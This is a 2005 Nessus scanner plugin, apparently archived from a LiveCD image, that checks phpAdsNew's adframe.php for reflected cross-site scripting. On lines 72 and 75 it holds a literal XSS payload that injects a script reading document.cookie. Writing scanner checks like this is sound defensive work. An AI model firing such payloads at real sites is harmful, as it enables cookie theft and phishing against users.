home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phpadsnew_xss.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  84 lines

  1. #
  2. # Script by Noam Rathaus GPLv2
  3. #
  4. # phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9
  5. # From: Maksymilian Arciemowicz <max@jestsuper.pl>
  6. # Date: 2005-03-15 03:56
  7. #
  8. # Changes by Tenable:
  9. #  - Added a BID
  10. #  - Added script_version()
  11. #
  12. #
  13. if(description)
  14. {
  15.  script_id(17335);
  16.  script_version("$Revision: 1.1 $");
  17.  script_bugtraq_id(12803);
  18.  
  19.  name["english"] = "phpAdsNew Multiple Vulnerabilities";
  20.  
  21.  script_name(english:name["english"]);
  22.  
  23.  desc["english"] = "
  24. phpAdsNew is an open-source ad server, with an integrated banner
  25. management interface and tracking system for gathering statistics.
  26. With phpAdsNew you can easily rotate paid banners and your own
  27. in-house advertisements. You can even integrate banners from
  28. third party advertising companies.
  29.  
  30. The product has been found to contain two vulnerabilities:
  31.  * Path disclosure vulnerability
  32.  * Cross Site Scripting
  33.  
  34. An attacker may use the cross site scripting bug to preform phishing
  35. attacks.
  36.  
  37. Risk factor: Medium";
  38.  
  39.  script_description(english:desc["english"]);
  40.  
  41.  summary["english"] = "Checks for the presence of a XSS in phpAdsNew";
  42.  
  43.  script_summary(english:summary["english"]);
  44.  
  45.  script_category(ACT_ATTACK);
  46.  
  47.  script_copyright(english:"This script is Copyright (C) 2005 Noam Rathaus");
  48.  family["english"] = "CGI abuses";
  49.  family["francais"] = "Abus de CGI";
  50.  script_family(english:family["english"], francais:family["francais"]);
  51.  script_dependencie("find_service.nes", "cross_site_scripting.nasl", "http_version.nasl");
  52.  script_require_ports("Services/www", 80);
  53.  exit(0);
  54. }
  55.  
  56. #
  57. # The script code starts here
  58. #
  59.  
  60.  
  61. include("http_func.inc");
  62. include("http_keepalive.inc");
  63.  
  64. port = get_http_port(default:80);
  65.  
  66. if(!get_port_state(port))exit(0);
  67.  
  68. debug = 0;
  69.  
  70. function check(loc)
  71. {
  72.  req = http_get(item: string(loc, "/adframe.php?refresh=example.com'<script>alert(document.cookie)</script>"), port:port);
  73.  r = http_keepalive_send_recv(port:port, data:req);
  74.  if( r == NULL )exit(0);
  75.  if("content='example.com\'><script>alert(document.cookie)</script>'>" >< r)
  76.  {
  77.   security_warning(port);
  78.   exit(0);
  79.  }
  80. }
  81.  
  82. foreach dir ( cgi_dirs() ) check(loc:dir);
  83.  
  84.